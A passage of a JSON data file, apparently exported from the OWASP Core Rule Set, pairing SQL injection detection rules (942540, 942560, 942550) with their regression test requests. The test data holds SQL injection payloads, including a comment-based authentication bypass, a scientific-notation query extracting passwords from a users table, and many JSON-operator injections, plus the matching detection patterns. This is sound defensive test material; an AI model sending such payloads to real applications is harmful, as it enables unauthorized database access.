"method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=`foo`;`bar`;`def`" }, "expected": { "should_block": false, "rule_ids": [ 942540 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=`foo`;`bar`;`def`" } ] }, { "description": "False positive test (markdown) mixed and balanced quotes", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Content-Type": "multipart/form-data; boundary=--------397236876" }, "data": "----------397236876\nContent-Disposition: form-data; name=\"document\"; filename=\"document.md\"\nContent-Type: text/markdown\n\n# Foo\nmy name is 'foo'; and I work on CRS.\n# Bar\nmy name is \"bar\"; and I work on CRS.\n----------397236876--\n" }, "expected": { "should_block": false, "rule_ids": [ 942540 ] }, "malicious_patterns": [ { "location": "post_body", "value": "----------397236876\nContent-Disposition: form-data; name=\"document\"; filename=\"document.md\"\nContent-Type: text/markdown\n\n# Foo\nmy name is 'foo'; and I work on CRS.\n# Bar\nmy name is \"bar\"; and I work on CRS.\n----------397236876--\n" } ] }, { "description": "Test for bypass with comment", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" }, "expected": { "should_block": true, "rule_ids": [ 942540 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 548, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?:[^']*'|[^\\\"]*\\\"|[^`]*`)[\\s\\x0b]*;", "actions": [ { "act_name": "id", "lineno": 549, "act_quote": "no_quote", "act_arg": "942540", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 550, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 551, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 552, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 553, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 553, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 553, "act_quote": "no_quote", "act_arg": "replaceComments", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 554, "act_quote": "quotes", "act_arg": "SQL Authentication bypass (split query)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 555, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 556, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 557, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 558, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 559, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 560, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 561, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 562, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 563, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 564, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 565, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 566, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 567, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 548 } }, { "rule_id": "942560", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)1\\.e(?:[\\(\\),]|\\.[\\$0-9A-Z_a-z])", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "replaceComments" ], "metadata": { "phase": "2", "message": "MySQL Scientific Notation payload detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Positive test for Scientific Notation in MySQL, e.g 1.e(", "test_id": 1, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" }, "expected": { "should_block": true, "rule_ids": [ 942560 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" } ] }, { "description": "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e(", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=1.e(ascii)" }, "expected": { "should_block": true, "rule_ids": [ 942560 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=1.e(ascii)" } ] }, { "description": "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e.tables", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=1.e.tables" }, "expected": { "should_block": true, "rule_ids": [ 942560 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=1.e.tables" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 578, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)1\\.e(?:[\\(\\),]|\\.[\\$0-9A-Z_a-z])", "actions": [ { "act_name": "id", "lineno": 579, "act_quote": "no_quote", "act_arg": "942560", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 580, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 581, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 582, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 583, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 583, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 583, "act_quote": "no_quote", "act_arg": "replaceComments", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 584, "act_quote": "quotes", "act_arg": "MySQL Scientific Notation payload detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 585, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 586, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 587, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 588, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 589, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 590, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 591, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 592, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 593, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 594, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 595, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 596, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 597, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 578 } }, { "rule_id": "942550", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)[\\\"'`][\\[\\{][^#\\]\\}]*[\\]\\}]+[\\\"'`]|(?:[\\-@]>?|<@|@[\\?@]|\\?(?:(?:)|&|\\|#>)|#(?:>>|-)|->>|[<>])[\\\"'`](?:[\\[\\{][^#\\]\\}]*[\\]\\}]+[\\\"'`]|\\$[\\.\\[])|\\bjson_extract\\b[^\\(]*\\([^\\)]*\\)", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "removeWhitespace" ], "metadata": { "phase": "2", "message": "JSON-Based SQL Injection", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"b\":2}'::jsonb <@ '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"b\":2}'::jsonb <@ '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 2, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"b\":2}'::jsonb <@ '{\"a\":1, \"b\":2}'\n", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"b\":2}'::jsonb <@ '{\"a\":1, \"b\":2}'\n", "test_id": 4, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"b\":2}' <@ '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"b\":2}' <@ '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 6, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"b\":2}'::json <@ '{\"a\":1, \"b\":2}'\n", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"b\":2}'::json <@ '{\"a\":1, \"b\":2}'\n", "test_id": 8, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"b\":2}' <@ '{\"a\":1, \"b\":2}'::json\n", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"b\":2}' <@ '{\"a\":1, \"b\":2}'::json\n", "test_id": 10, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"b\":2}'::jsonb @> '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"b\":2}'::jsonb @> '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 12, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"b\":2}'::jsonb < '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"b\":2}'::jsonb < '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 14, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"b\":2}'::jsonb > '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"b\":2}'::jsonb > '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 16, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"a\":2,\"c\":[4,5,{\"f\":7}]}' -> '$.c[2].f' = '7'\n", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"a\":2,\"c\":[4,5,{\"f\":7}]}' -> '$.c[2].f' = '7'\n", "test_id": 18, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR json_extract('{\"id\": 14, \"name\": \"Aztalan\"}', '$.name') = 'Aztalan'\n", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR json_extract('{\"id\": 14, \"name\": \"Aztalan\"}', '$.name') = 'Aztalan'\n", "test_id": 20, "request": { "method": "GET", "uri": "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: blah/\"}' and data 